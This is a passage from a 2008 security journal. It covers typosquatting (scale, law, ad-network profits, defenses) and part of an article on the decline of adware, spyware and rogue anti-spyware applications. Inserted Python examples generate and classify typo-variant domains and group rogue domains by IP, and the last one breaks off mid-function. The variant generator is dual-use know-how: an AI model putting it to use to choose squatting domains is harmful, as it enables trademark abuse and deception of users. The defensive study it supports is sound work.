7 Hamachi, by H D Moore and Aviv Raff. http://metasploit.com/users/hdm/tools/hamachi/hamachi.html
8 637 Million Users Vulnerable to Attack, Frequency X. http://blogs.iss.net/archive/TheWebBrowserThreat.html
9 Keep Your Operating System Updated: Frequently Asked Questions. http://www.microsoft.com/protect/computer/updates/faq.mspx
10 MS Office Flaws Ideal Tools for Targeted Attacks. http://blog.washingtonpost.com/securityfix/2006/04/ms_office_flaws_ideal_tools_fo_1.html
11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/
12 The New E-spionage Threat. http://www.businessweek.com/print/magazine/content/08_16/b4080032218430.htm
13 Dolphins Web Sites Hacked in Advance of Super Bowl. http://www.networkworld.com/news/2007/020207-dolphins-web-sites-hacked-in.html
14 Hacking the Interwebs, January 12, 2008. http://www.gnucitizen.org/blog/hacking-the-interwebs/
15 Application-Specific Attacks: Leveraging the ActionScript Virtual Machine. http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pdf
16 Unusual Bugs, Ilja van Sprundel. http://www.ruxcon.org.au/files/2006/unusual_bugs.pdf
17 Heap Feng Shui in JavaScript. http://www.determina.com/security.research/presentations/bh-eu07/bh-eu07-sotirov-paper.html


Typosquatting: Unintended Adventures in Browsing


By Benjamin Edelman

Browse the web, and you may be exposed to a variety of attacks that are well chronicled in the McAfee Security Journal.
From malicious banners to adware bundlers, the sites you intend to visit may cause remarkable harm. But users should also be aware of the sites they do not intend to visit: the sites they stumble across by accident.

Basic Strategy
For those of us who sometimes slip up when typing a URL, there's a special kind of security threat to watch out for. This plague of the imperfect typist is called typosquatting. The typosquatter strategy is to anticipate domain names users might accidentally request. Consider a user who misspells bankofamerica.com by doubling the k and dropping the e to yield bankkofamrica.com. Ordinarily, that user would receive a browser error message, directing the user to the real Bank of America site. But suppose a typosquatter had anticipated the user's error. The typosquatter might register the misspelled domain (and several other inaccurate names) in hopes that users will eventually wander in. Historically, typosquatters primarily focused on spelling errors: inserting a stray letter, dropping a letter, or transposing two letters. But recently typosquatters have found other tricky ways to attract unintended traffic. Suppose a user omits the period that separates www from a site's domain name, for example, wwwmcafee.com instead of www.mcafee.com. Typosquatters can register that domain. (As it turns out, someone did! And McAfee is working to recover it.) In the case of trailing periods, typosquatters rightly anticipate that web browsers will automatically append a .com to a domain with no top-level domain, so squatters also claim domains such as www.mcafeecom.com. Still other squatters focus on adding http prefixes, or registering the corresponding .coms for domains that actually reside in other top-level domains.

How do users end up at these typosquatting sites? Some users may forget a site's correct spelling. Others make typing errors. (Consider non-native English speakers, users with poor eyesight, and users still improving their typing skills.) Novice users may not realize the correct punctuation of a site's full address, and hurried users may wrongly enter part of a URL. Even the most sophisticated user can make an entry error on a mobile device with a small keyboard, on a handwriting-recognition tablet, or during a bumpy ride in a moving vehicle. So it would be wrong to blame the users who request typosquatting sites. On the contrary, although users certainly end up at these sites, they generally get there by mistake.
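As an added example (not SiteAdvisor's or the author's code), the following Python enumerates the mistake classes described above for a given name and matches them against a constructed list that stands in for a registered-domain feed; it goes one step beyond the page by chaining mistakes to a chosen depth, which is what it takes to reach the article's two-error bankkofamrica.com.

```python
"""Enumerate the typo-variant domains a squatter might register for a
target name, then report which of them a defender already finds registered.

Added example, not SiteAdvisor's or the author's code.  SAMPLE_REGISTERED
is constructed for the demonstration; in practice the list would come from
zone-file or WHOIS data.
"""
import string


def _one_edit(domain: str) -> set[str]:
    """All single-mistake variants of a registrable name such as 'mcafee.com'."""
    if "." not in domain:
        return set()
    name, tld = domain.rsplit(".", 1)
    out: set[str] = set()
    # Spelling errors: a stray letter inserted anywhere.
    for i in range(len(name) + 1):
        for c in string.ascii_lowercase:
            out.add(f"{name[:i]}{c}{name[i:]}.{tld}")
    # A dropped letter.
    for i in range(len(name)):
        out.add(f"{name[:i]}{name[i + 1:]}.{tld}")
    # Two adjacent letters transposed.
    for i in range(len(name) - 1):
        if name[i] != name[i + 1]:
            out.add(f"{name[:i]}{name[i + 1]}{name[i]}{name[i + 2:]}.{tld}")
    # The period between www and the name omitted (wwwmcafee.com).
    out.add(f"www{name}.{tld}")
    # The period before the TLD omitted; the browser appends .com
    # (mcafeecom.com), so that is the name the squatter registers.
    out.add(f"{name}{tld}.com")
    # An http prefix fused onto the name.
    out.add(f"http{name}.{tld}")
    out.add(f"httpwww{name}.{tld}")
    # The .com twin of a name that really lives in another TLD.
    if tld != "com":
        out.add(f"{name}.com")
    out.discard(domain)
    return out


def typo_variants(domain: str, depth: int = 1) -> set[str]:
    """Candidates within `depth` mistakes of `domain`.  depth=2 covers the
    article's bankkofamrica.com (doubled k plus dropped e)."""
    domain = domain.lower()
    out = _one_edit(domain)
    frontier = set(out)
    for _ in range(depth - 1):
        frontier = {v for d in frontier for v in _one_edit(d)}
        out |= frontier
    out.discard(domain)  # a second edit can undo the first; never list the real site
    return out


# Constructed stand-in for a registered-domain feed.
SAMPLE_REGISTERED = [
    "bankofamerica.com",       # the genuine site
    "bankkofamrica.com",       # the article's two-mistake example
    "wwwbankofamerica.com",    # missing period after www
    "bankofamericacom.com",    # missing period before .com
    "example.com",             # unrelated noise
]


def find_squats(domain: str, registered, depth: int = 2) -> list[str]:
    """Registered names that are typo variants of `domain`, sorted."""
    reg = {r.lower().rstrip(".") for r in registered}
    return sorted(typo_variants(domain, depth) & reg)


if __name__ == "__main__":
    for squat in find_squats("bankofamerica.com", SAMPLE_REGISTERED):
        print(squat)
```

At depth 2 a 13-letter name yields roughly 150,000 candidates, so in practice the candidate set is matched against a bulk registration feed rather than queried one name at a time.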

The Scope of Typosquatting


With many users making a wide variety of errors, typosquatting has become remarkably widespread. The McAfee SiteAdvisor service runs ongoing searches for typosquatters, and in the McAfee Avert Labs May 2008 examination, we found more than 80,000 domains typosquatting on just the top 2,000 web sites. Go deeper into the web, and typosquatting grows even more.


Domains frequented by kids are particularly rich targets for typosquatters. For example, a recent analysis identified 327 different typosquatting registrations that are all close variants of cartoonnetwork.com. Freecreditreport.com led the list compiled with SiteAdvisor technology; also popular were YouTube, Craigslist, Wikipedia, and Bank of America. (For the numbers, see Figure 1. And for examples of creative misspellings, see the Appendix.)

Legal Response
In general, typosquatting is illegal in the United States. The 1999 Anti-Cybersquatting Consumer Protection Act (ACPA), 15 USC 1125(d), prohibits registering, trafficking in, or using domain names that are identical to, or confusingly similar to, a trademark or famous name. The ACPA grants damages of a typosquatter's ill-gotten profits (15 USC 1117(a)(1)), or statutory damages of $1,000 to $100,000 per typosquatting domain (as the court considers just) (1117(d)). Other countries' laws treat typosquatting somewhat differently, but most nations view typosquatting as a genre of trademark infringement, hence it is prohibited. Furthermore, the Uniform Dispute Resolution Policy (UDRP) establishes arbitration for complaints about infringing domains. To register a site in a major top-level domain, a registrant must agree to the UDRP's jurisdiction, so the UDRP applies regardless of the location of the typosquatting site. That said, UDRP remedies are limited to the forfeiture of an infringing domain without a payment of money damages. Although the ACPA imposes significant penalties, typosquatters seem to realize that enforcement is unlikely. So despite the threat of major sanctions, typosquatters continue to operate with abandon.

Typosquatters' Profit Strategy


Once a user arrives at a typosquatting site, the squatter wants to make as much money as possible. Some years ago, notorious typosquatter John Zuccarini forced his unwitting visitors to view sexually explicit web sites they did not want and had not requested. Zuccarini registered at least 8,000 domains, which I documented at length.[1] But he didn't get away with this scam forever: In September 2003, Zuccarini was arrested for violation of the Truth in Domain Names Act, which specifically prohibits any action that uses a misleading domain name with the intent to deceive a person into viewing obscenity. These days, the typosquatters' standard approach is advertising. Among the thousands of typosquatting domains I've examined in the past several years, it's rare to find one not showing ads.

DOMAIN                    NUMBER OF TYPOSQUATTING DOMAINS
freecreditreport.com      742
cartoonnetwork.com        327
youtube.com               320
craigslist.org            318
blogspot.com              276
clubpenguin.com           271
wikipedia.com             266
runescape.com             264
miniclip.com              263
bankofamerica.com         251
dailymotion.com           250
metroflog.com             249
addictinggames.com        248
friendster.com            246
myspace.com               239
verizonwireless.com       238
facebook.com              235

Figure 1: Typosquatting's most-popular list. This table reports a selection of trademarks highly targeted by typosquatters. The data comes from the May 2008 examination of the SiteAdvisor service data set.


Figure 2: A typosquatter registers a domain name similar to a leading bank's, and then, indirectly, sells advertising links to that and other banks.

When typosquatting sites show ads, they typically attempt to select ads relevant to the site the user was (in all likelihood) trying to reach. So in the bankkofamrica.com example we mentioned, the resulting ads promote, predictably, banks. Which banks? First on the list is Bank of America itself. (See Figure 2.) Surprised? On the one hand, that ad placement is useful for Bank of America: at least they manage to reach the customer, despite the customer's typographic error. But on the other hand, it's remarkable for this typosquatter to ask Bank of America to pay to reach a customer who already requested Bank of America by name. After all, the typosquatter is infringing Bank of America's trademark, exactly in violation of the ACPA, which says that the typosquatter can't register such domains and that the typosquatter even has to pay Bank of America high statutory damages if the bank files a suit. But instead, the typosquatter ends up selling advertising space to Bank of America, which, at least initially, may be none the wiser. How is this possible? Typosquatters don't directly sell space to advertisers. (Imagine the conversation: "We'd like to show your ads on our typosquatting site." "You want to put our ads where?") Instead, typosquatters sell their inventory to ad networks, which in turn recruit advertisers. The largest network in this space is Google, whose AdSense for Domains product and other domain-syndication products serve ads on more than 80 percent of the typosquatting sites recently uncovered by SiteAdvisor technology.


What's Next for Typosquatters?


In June 2008, the Internet Corporation for Assigned Names and Numbers (ICANN) voted to speed the process of creating more top-level domains. Beyond the familiar domains most users know, there are already lesser-used domains such as .info, .biz, .museum, and .travel. Soon, we can expect new domains like .nyc or .lib (as some have suggested). More top-level domains mean more opportunities for cybersquatting: for exact registration of famous trademarks, or for close typographic variations of famous names. When users request these domains, whether in misguided attempts to reach the real sites, or in mistaken attempts to recall sites' true addresses, typosquatters can jump in with their infringing interlopers. But there are signs that typosquatting may soon be on the decline. For one, some major web sites have taken action to protect themselves and their customers from typosquatters. For example, in 2006, Neiman Marcus sued domain registrar Dotster. Neiman Marcus alleged that Dotster registered scores of domains infringing Neiman Marcus marks, showing ads to maximize its revenues from these typosquatting sites. Neiman Marcus claimed Dotster acted not just as registrar for these domains, but also as registrant, choosing which domains to register, and reaping the profits from resulting ads. The case settled in 2007 on confidential terms, and Neiman Marcus has since gone on to sue other large squatters. (Disclosure: I served as a consultant to Neiman Marcus in some of these cases.) Verizon and Microsoft have also been vigilant in similar litigation. On one hand, these cases aren't particularly prevalent. But the ACPA's statutory damages ($1,000 and more per domain) can force typosquatters to pay big money for their large-scale infringements. Microsoft alone has received more than $2 million in typosquatting settlements. Further, persistent rumors suggest top ad networks, particularly Google, may abandon the typosquatting industry. Recent trademark-holder class-action litigation has challenged Google's role in funding the typosquatting industry, and these typosquatting placements have been a repeated source of advertiser and trademark-holder complaints. If Google ceased funding typosquatting, typosquatters would have far less incentive to register infringing domains; no other ad network is likely to pay typosquatters as much as Google does. (Disclosure: I serve as co-counsel in Vulcan Golf, et al., v. Google, et al., trademark-holder class-action litigation regarding Google's responsibility for the typosquatting sites where Google pays to place ads.)

Defenses
Though the typosquatting battles continue, concerned users can do plenty to protect themselves. First, be careful when you type. Be alert for typosquatting, particularly when requesting a site that's hard to spell. Guessing a domain name may not be the best choice; consider using a search engine instead. Second, after arriving at a site, look twice before you proceed. Is this really the site you intended to reach? Is this link an ordinary pointer, or a paid advertisement? Should this government site really be a .com, or did you want the corresponding .gov? A bit of critical thinking may serve you well as a defense against typosquatting or other attacks. Appropriate software can also help protect users from typosquatters. SiteAdvisor technology identifies many typosquatting sites. A typo-protection service, such as OpenDNS, provides additional protection. Search engines typically offer help ("Did you mean?" spelling correction), so that users can avoid many typosquatting sites by running searches instead of typing domain names directly into a browser's address bar.

Benjamin Edelman is an assistant professor at the Harvard Business School, where he studies electronic marketplaces and online fraud. He is also a special advisor to McAfee for the SiteAdvisor service, offering an independent perspective to supplement SiteAdvisor site ratings. Though a fast and accurate typist, Professor Edelman has occasionally embarked on unintended browsing adventures.


APPENDIX
Examples of Typosquatting Sites: Cartoonnetwork.com
Among the more than 80,000 domains in SiteAdvisor's May 2008 examinations, we found these typosquatting variations of cartoonnetwork.com:
• ccartoonnetwork.com
• dcartoonnetwork.com
• ncartoonnetwork.com
• cfartoonnetwork.com
• ceartoonnetwork.com
• ckartoonnetwork.com
• jcartoonnetwork.com
• vcartoonnetwork.com
• caertoonnetwork.com
• caortoonnetwork.com
• cairtoonnetwork.com
• cuartoonnetwork.com
• acartoonnetwork.com
• bcartoonnetwork.com
• canrtoonnetwork.com
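The check a brand owner or a site-rating service can run against names it observes, written here as an added example (not SiteAdvisor's logic): it tells whether a name is one keystroke away from a protected domain and which kind of slip produced it, so it covers the extra-letter variants in the appendix above as well as dropped, swapped, and substituted letters. The brand and the observed list are constructed for the demo.

```python
"""Check whether an observed domain is one keystroke away from a protected
brand domain, and say which kind of slip produced it.  Added example; not
SiteAdvisor code.  The brand and the observed names are constructed for the
demo (the first three are the cartoonnetwork.com variants from the appendix)."""

from typing import Dict, List, Optional, Tuple

Edit = Tuple[str, int, str]  # (kind, position in the longer string, char(s))

PROTECTED = "cartoonnetwork.com"

OBSERVED: List[str] = [
    "ccartoonnetwork.com",  # extra letter (appendix)
    "caertoonnetwork.com",  # extra letter (appendix)
    "canrtoonnetwork.com",  # extra letter (appendix)
    "cartonnetwork.com",    # dropped letter
    "cartoonnetwrok.com",   # two letters swapped
    "cartoonnetwork.con",   # wrong letter in the suffix
    "cartoonnetwork.com",   # the real site
    "example.org",          # unrelated
]


def classify_typo(brand: str, candidate: str) -> Optional[Edit]:
    """Return the single edit (insertion, omission, substitution, or
    transposition of adjacent characters) that turns `brand` into
    `candidate`, or None when they are identical or further apart."""
    brand, candidate = brand.lower(), candidate.lower()
    if brand == candidate:
        return None
    lb, lc = len(brand), len(candidate)

    if lc == lb + 1:  # candidate has one extra character
        for i in range(lc):
            if candidate[:i] + candidate[i + 1:] == brand:
                return ("insertion", i, candidate[i])
        return None

    if lc == lb - 1:  # candidate is missing one character
        for i in range(lb):
            if brand[:i] + brand[i + 1:] == candidate:
                return ("omission", i, brand[i])
        return None

    if lc == lb:
        diffs = [i for i in range(lb) if brand[i] != candidate[i]]
        if len(diffs) == 1:
            i = diffs[0]
            return ("substitution", i, candidate[i])
        if (len(diffs) == 2 and diffs[1] == diffs[0] + 1
                and brand[diffs[0]] == candidate[diffs[1]]
                and brand[diffs[1]] == candidate[diffs[0]]):
            i = diffs[0]
            return ("transposition", i, candidate[i:i + 2])
    return None


def find_typo_domains(brand: str, observed: List[str]) -> Dict[str, Edit]:
    """Map each observed name that is one edit from `brand` to that edit.
    Exact matches and unrelated names are left out."""
    hits: Dict[str, Edit] = {}
    for name in observed:
        edit = classify_typo(brand, name)
        if edit is not None:
            hits[name] = edit
    return hits


if __name__ == "__main__":
    for name, (kind, pos, chars) in find_typo_domains(PROTECTED, OBSERVED).items():
        print(f"{name:24} {kind:13} at {pos:2}: {chars!r}")
```

A hit is a lead, not a verdict: legitimate near-names exist, so review flagged domains (content, ownership, rating) before acting on them.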

Fall 2008

Whatever Happened to Adware and Spyware?

By Aditya Kapoor

Adware and spyware are two of the primary tools used for the online promotion of advertising and marketing.

These applications often benefit from social engineering methodologies and often piggyback on an otherwise useful freeware or shareware application that a user wants to download. These unwanted applications typically come with end-user license agreements (EULAs) that are supposed to define their behavior. However, these descriptions are normally not explicit or useful, causing confusion for users and opening the door to further social engineering traps. In the first half of this decade, adware and spyware, often called potentially unwanted programs, or PUPs, grew exponentially. After 2005, however, we have seen a constant decline in their numbers. In this article we'll highlight the key changes in online compensation models that are the driving factor of this decline. Adware and spyware have mostly split into distinct fields: the former with cleaner applications and a better user-consent model developed by key adware players, and the latter sometimes malicious and frequently defined as Trojan malware. This comparatively clean divide has helped keep the numbers of adware and spyware applications low. So if these PUPs are no longer a threat, will they soon be gone for good? To answer that, we will discuss the changing threat landscape and the role social engineering plays.

Seeking Clarity
The terms adware and spyware are frequently used loosely and interchangeably, and often create confusion. We'll follow definitions supplied by the Anti-Spyware Coalition (ASC).1

Adware: A type of advertising display software that delivers advertising content, potentially in a manner or context that may be unexpected and unwanted by users. The ASC's Risk Model document details many of the behaviors that may be considered unexpected or unwanted. Many adware applications also perform tracking functions and, therefore, may also be categorized as tracking technologies. Some consumers may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program, or are frustrated by its effects on system performance. On the other hand, some users may wish to keep particular adware programs if their presence subsidizes the cost of a desired product or service, or if they provide advertising that is useful or desired, such as ads that are competitive or complementary to what the user is looking at or searching for.

Spyware: In its narrow sense, spyware is a term for tracking software deployed without adequate notice, consent, or control for the user. In its broader sense, spyware is used as a synonym for what the ASC calls "Spyware (and Other Potentially Unwanted Technologies)": technologies deployed without appropriate user consent and/or implemented in ways that impair user control over:
• Material changes that affect their user experience, privacy, or system security
• Use of their system resources, including what programs are installed on their computers
• Collection, use, and distribution of their personal or other sensitive information

Acknowledging that the common term spyware has now largely drifted from its exact meaning, the members of the ASC have decided to use "spyware (in its narrow sense)" for technical documents. Recognizing further that it is impossible to avoid the wider connotations arising from popular usage, the ASC also notes the existence of a general interpretation that includes all PUPs. In this article, the term spyware is never used in its broad sense but always in the narrow sense, namely, as software that is related to marketing. We use the term monitoring software to define pure spy programs such as keyloggers.

A Fast Takeoff
Adware and spyware grabbed our attention in the year 2000 with the appearance of Adware-Aureate, which employed the user's browsing history to display ads. This move led to the creation of one of the first anti-spyware applications, Gibson Research Corp.'s OptOut.2 Adware and spyware started growing prominently around late 2004 and peaked in 2005. (See Figures 1 and 2.) The primary motive was to generate revenue via millions of installations on users' desktops (via the pay-per-installation model) as well as to display advertisements (via the pay-per-click model). The adware and spyware industry flourished in these years due to the large amount of revenue generated from ads. Every time a user clicked a certain ad, the ad provider received a commission.

Figure 1: Adware growth reached its peak in 2005. (Source: McAfee Avert Labs.) [Bar chart: number of adware applications, 0 to 5,000, by year from 2000 to 2008; the 2008 value is a forecast.]

Figure 2: Spyware and monitoring programs have also seen a general decline since 2005, but we anticipate an upturn in the latter in 2008. (Source: McAfee Avert Labs.) [Bar chart: number of spyware and monitoring programs, 0 to 300, by year from 2000 to 2008, with spyware and monitoring programs shown as separate series; the 2008 value is a forecast.]

Compensation Models and Caveats
Adware and spyware use two major compensation models for online advertisements. Both models work well in a perfect world, but how do they fare in a world that includes people with malicious intent? Let's take a look at how these models can be exploited.

Pay-per-install: The client-side model
In the pay-per-install (PPI) model, companies selling products or services pay the adware provider to display ads. The adware provider in turn pays individuals or affiliates to distribute its adware using bundling or other means. (ZangoCash, for example, pays from $0.75 to $1.45 in the United States for each piece of adware installed.4) The software finally has to be installed on the client machine. The PPI model normally tracks installations of software by using a particular referrer. So, if John Doe hosts a PPI-based adware installer on his web site and some other user downloads and installs that software via the site, John will receive a certain amount of money. To increase the downloads from his site, John might try to increase traffic using attention-getting content such as catchy titles, adult images or videos, free games, or ringtones.

As traffic and payments increase, John could decide to use an exploit to install the adware application without the users being aware of the installation. Many such applications display a EULA before installing, but this would only alarm visitors, so John might further decide to tweak the application to suppress the EULA and increase his installation score. Now if John is a seasoned hacker, he could replicate this model on thousands of compromised sites to exponentially increase his installations and payoff. Fellow McAfee Security Journal author Benjamin Edelman describes a similar, real scenario on his web site.5


The PPI model of compensation proved very lucrative for programmers as well as for people with malicious intent, thus contributing to the fantastic growth of adware and spyware. Many installation vectors support this model. These vectors can be broadly divided into two categories:

• Social engineering: This requires user interaction and relies on the user to install and, in some cases, even propagate the software. The number of social engineering methods is limited only by the imaginations of attackers, who can often lure even the most vigilant users. In the example of John Doe, offering free games or ringtones is bait that many people cannot resist. Ultimately, the user decides to take the risk or leave the free goodies on the table.
• Exploits: Installation of adware through exploits may not require any human interaction at all; however, in many cases the user is lured by social engineering techniques to malicious web sites that host these exploits.

Even if an installation occurs via an exploit or direct spam, security companies may still not determine that the software is malicious, because of vendor claims that they have no role in this distribution and that other people are exploiting their software.

Pay-per-click: The server-side model6
The pay-per-click (PPC) model has two variations: sponsored ads and content-based ads. The PPC model does not require any adware or spyware software to be installed on the user's system, but the model may depend on the user's input for context (for example, from search engine results) to provide relevant ads. Google content-based ads, for example, work by using the PPC model. Some of the most common delivery mechanisms for PPC content are:

• Banner ads: Ads are shown within a banner or predefined space. This content can change.
• Pop-up or pop-under ads: Ads are delivered in separate windows, creating an annoying user experience.
• Flash-based ads: These are similar to banner ads but use Flash animation to vary the ad content.

The PPC model can work in a much more controlled environment, in which the web site hosting these ads may choose the delivery mechanism. Although the PPC model is server based and would seem more secure, it's not entirely foolproof. Scammers can still use deceptive practices to trick users.7 Because most of the ad content is stored on servers and uses JavaScript, Flash, and other rich-content technologies, inserting malicious ads in the ad stream is not difficult.8, 9 In one such case, a Yahoo-owned ad network unknowingly distributed malicious banner ads that eventually downloaded Trojans on users' machines. In this particular scenario, banner ads were shown on web sites such as MySpace and PhotoBucket. These malicious ads were slipped into Yahoo's ad network undetected. We've also seen user clicks hijacked by DNS cache poisoning.10 However, users are not directly affected in these cases; the ISP or server hosting the ads is more vulnerable to these threats.

To better mitigate the attack vectors exploiting these compensation models, let's take a brief overview of how social engineering plays a role in this online market of endless revenue-generation possibilities.

Social Engineering Aspects
"Hackers are going to go after the weakest link in the security chain, which is always the people." Kevin Mitnick (2007)11

Regardless of the model adware developers use, their primary success factor is users. In our example of John Doe, people were infected because they visited the malicious web site, driven by Doe's social engineering tactics. One reason social engineering is frequently successful is that many people trust what they see and are, by nature, not suspicious of certain online activities. Malicious social engineers know how to exploit human nature. A case study conducted by the U.S. Department of the Interior points out that 84 percent of government departments attribute various security breaches to human error; 80 percent of the departments attribute these errors to a lack of security training, a lack of security knowledge, or a failure to follow procedures.12 Hundreds of thousands of malware samples use social engineering to get installed on users' machines; this is one of the most common vectors of malware delivery. Matthew Braveman sorts the various installation vectors into four major categories.13 According to his study, almost one-third of the malware was installed by leveraging social engineering methods. Adware and spyware have adopted many popular social engineering methodologies and have come up with new techniques to distribute their software. Social engineering is the favored installation vector of the PPI model, which offers broader options for delivering adware and spyware. These applications can be delivered using apparently innocuous mechanisms, such as bundled freeware, or by suspicious mechanisms, such as spam or email attachments with deceptive text. A user who wants freeware, for example, can knowingly install adware to use the free services.


Figure 3: Several vectors expose users to unwanted and malicious programs. [Diagram: a user reaches a social engineering web site (e.g., one offering free MP3 links, adult video, etc.) by four paths of differing trust: a link received via IM, email, or spam (lowest trust level); a search engine (low trust level); a social networking web site (high trust level); and a link received via a friend's profile on a social networking site, Google Notebook, a trusted domain, etc. (high trust level).]

It's About Trust
Figure 3 depicts four scenarios for user exposure to a social engineering site. Although the illustration is simple, it can help us understand the following real-world cases. The key is that the higher the trust level, the more likely a particular social engineering technique will succeed. We'll explain further using three brief case studies.

Case 1: Social networking web sites
Social networking sites are a boon to social engineers because most people on these sites are looking to make or stay in touch with friends. Social engineers may create relationships to increase the trust factor, as shown at the top of Figure 3. The trust level is usually very high for this category. A number of notable social engineering attacks have exploited this trust to install adware on users' machines:

• MySpace Adult Content Viewer (trust level: medium). This incident relied on a user clicking a pop-up ad featuring young people with titles such as "I want to be loved."14 Clicking on these ads downloaded the MySpace Adult Content software, which reportedly downloaded adware.
• MySpace fraudulent YouTube video (trust level: high). Websense reported in late 2006 a fraudulent YouTube video that was posted on multiple fake profiles at MySpace.15 Attempting to view the video required installing Zango Cash.
• Facebook Secret Crush application (trust level: very high). In January 2008, Fortinet issued an advisory about a malicious widget called Secret Crush that was trying to install adware.16 This social engineering tactic worked by first sending a Facebook request with the title "1 secret crush invitation." Upon opening this request, the user had to install a widget to find out who sent the secret crush. The request further prompted the user to forward it to five friends before it would display who sent the crush. Naive users forwarded this message to friends, making this a social worm. After taking these steps, all that users saw was a message to download the adware Zango. Victims were easily lured by this scenario because the trust level was very high.

Case 2: Banner ads
Banner ads lie in the domain of the PPC model. The trust level in these real-world scenarios was very high, as users were visiting trusted sites that they visited frequently.

• In 2006, The Washington Post reported a malicious banner ad on MySpace that served adware as well as Trojans to millions of users using Microsoft Windows Metafile exploits; this did not require any user intervention.17
• In 2008, we've seen an increase in malicious banner ads. The latest at the time we wrote this article was a Flash-based ad at usatoday.com.18 Just by visiting the page, users were socked with multiple malware as well as fake alerts (a popular social engineering tactic) to download a rogue anti-spyware application called Malware Alert. (Rogue programs can include PUPs as well as Trojans.)

Case 3: Other intriguing tactics
• Spoofed email (trust level: low). In one case, spoofed emails from eBay were spammed with links pointing to adware downloads.19 The social engineering aspect occurred in the content of the email, which warned unsuspecting users that there was a problem with their billing information and that they needed to update the data by downloading particular software.
• Fake error pages (trust level: medium). Certain web sites displayed fake "page not found" error messages and offered to resolve the situation by downloading an ActiveX component that installed WinFixer.20
• Google Notebook spam (trust level: high). In a recent development, scammers used yet another social engineering technique by spamming links to Google Notebook pages.21 The hyperlink is in the format www.google.com/notebook/public/[UserID]/[blocked]. The domain google.com makes people less suspicious and encourages them to click on the malicious web pages, which host multiple links to adult sites or fake videos. These eventually download various rogue anti-spyware apps.


A Silent Retreat
The initial lack of laws regulating adware and spyware applications gave lots of freedom to their developers, whether their motivations were merely financial or actually malicious. At first, users seemed protected because they had EULAs to warn them of any unwanted effects from these applications. But the EULAs were often confusing, incomplete, or unseen. Once found, they're hard to read, often enclosed in tiny windows that display only a few words at a time. With such an effective smokescreen, why have adware and spyware declined? Several factors have contributed.

Lawsuits
Due to an increase in abuses by adware and spyware apps, consumers and other plaintiffs have filed multiple lawsuits against some big distributors.22, 23, 24, 25, 26, 27 Various court rulings have helped to limit the numbers of adware and spyware. In the settlement against Zango,12 for example, the court requires that Zango monitor its third-party distributors to assure that its affiliates and their sub-affiliates comply with the FTC order. The ruling also bars Zango, directly or through others, from exploiting security vulnerabilities to download software, and requires that it give clear and prominent disclosures and obtain consumers' express consent before downloading software onto consumers' computers. Such orders have helped to weaken the PPI method and have driven ad distributors to clean up their acts.

Public awareness and industry groups
The Federal Trade Commission has an informative web site28 that provides tips on how to protect against spyware and how to report abuses. The Anti-Spyware Coalition also offers a lot of information and details about this threat.29 Due to the efforts of these organizations, both consumers and lawmakers have a much better understanding of the issues and rules related to online advertising. This increased awareness has helped to lower the occurrence of these unwanted applications.

Bad publicity and potential lawsuits against advertisers associated with adware companies
The money that drove the adware and spyware market initially came from advertisers that used adware companies to show the ads. These product and service companies did not at first fully investigate how the adware firms distributed their ads. In a historic settlement published on January 29, 2007,30 the agreement stated that prior to contracting with a company to deliver their ads, and quarterly thereafter, the companies must investigate how their online ads are delivered. The companies must immediately cease using adware programs that violate the settlement agreements or their own adware policies. Because advertisers now understand the risks (invasion of privacy, improper consent, and others) associated with the PPI model, they are moving toward the PPC model, which requires no applications on users' systems.

Rogue Applications
Because malware authors gain easy money using scare tactics, there is an increasing trend to distribute rogue applications and fake-alert Trojans, which display bogus error or infection messages. In most cases, the fake-alert Trojans are the downloaders of the rogue applications, which detect false registry keys and files as malware. Sometimes these rogue applications drop the files just to detect them later; in these cases, the rogue application warrants a Trojan classification (such Trojans are included in Figure 4). We have also observed many cases of adware installed by Trojans. The Downloader-UA Trojan category is one such family that uses social engineering tactics to download fake programs. Discovered in late 2004, this family employs loopholes in the way Microsoft Windows Media Player uses digital rights management technology, luring users to download specially crafted media files.31, 32 In 2008, the same family of Trojan was involved again in luring users to download a fake MP3 player to play a canned selection of songs; it also downloaded heaps of adware to their systems.33 The growth of rogue applications (PUPs and Trojans) has been exponential in 2008 compared with previous years. (See Figure 4.) To gauge the frequency of rogue anti-spyware products distributed via downloader Trojans, we analyzed a set of IP addresses involved in initiating these downloads. A query executed at the domain hosts-file.net returned 158 domains associated with the same IP address.34 (See Figure 5.)

Figure 4: Unlike adware and spyware, rogue applications (PUPs and Trojans) have increased dramatically in 2008. (Source: McAfee Avert Labs.) [Bar chart: number of rogue applications, 0 to 1,000, by year from 2005 to 2008, with PUPs and Trojans as separate series; the 2008 value is a forecast.]
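One way to turn the observation above (many rogue-application domains resolving to a single address) into a repeatable check, as an added example that is not the article's analysis or McAfee code: group DNS answers by IP, count the distinct registered domains behind each, and weigh how many of them carry fake-scanner naming so that ordinary shared hosting is not flagged on count alone. The records, the addresses (RFC 5737 documentation range 192.0.2.0/24), and the keyword list are all constructed.

```python
"""Group DNS answers by IP address and flag addresses that front many
distinct domains with rogue-scanner style names, the pattern behind the
158-domain query described above.  Added example, not the article's own
analysis or McAfee code; the records, addresses (RFC 5737 documentation range
192.0.2.0/24) and keyword list are constructed for the demo."""

from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

Record = Tuple[str, str]  # (hostname, IPv4 address it resolved to)

# Constructed passive-DNS style observations.
RECORDS: List[Record] = [
    ("antivirus-scan-pro.example", "192.0.2.10"),
    ("www.antivirus-scan-pro.example", "192.0.2.10"),  # same domain, extra label
    ("pc-cleaner-2008.example", "192.0.2.10"),
    ("securite-pc-scan.example", "192.0.2.10"),        # French-language clone
    ("systemreiniger-pro.example", "192.0.2.10"),      # German-language clone
    ("blog-a.example", "192.0.2.40"),                  # ordinary shared hosting
    ("blog-b.example", "192.0.2.40"),
    ("blog-c.example", "192.0.2.40"),
    ("www.my-photos.example", "192.0.2.20"),
    ("mail.my-photos.example", "192.0.2.20"),
]

# Name fragments typical of fake scanner / cleaner products, in a few
# languages.  Constructed list; extend it from what you actually observe.
ROGUE_TOKENS = ("antivirus", "antispyware", "scan", "clean", "reiniger", "securite")


def registered_domain(hostname: str) -> str:
    """Collapse a hostname to its registered domain (last two labels).
    Good enough for this data; a production tool should consult the public
    suffix list so that names under .co.uk and the like are not mangled."""
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def rogue_like(domain: str) -> bool:
    """True when the domain name contains a fake-scanner style fragment."""
    return any(token in domain for token in ROGUE_TOKENS)


def domains_per_ip(records: Iterable[Record]) -> Dict[str, List[str]]:
    """Distinct registered domains seen behind each IP, sorted."""
    groups: Dict[str, set] = defaultdict(set)
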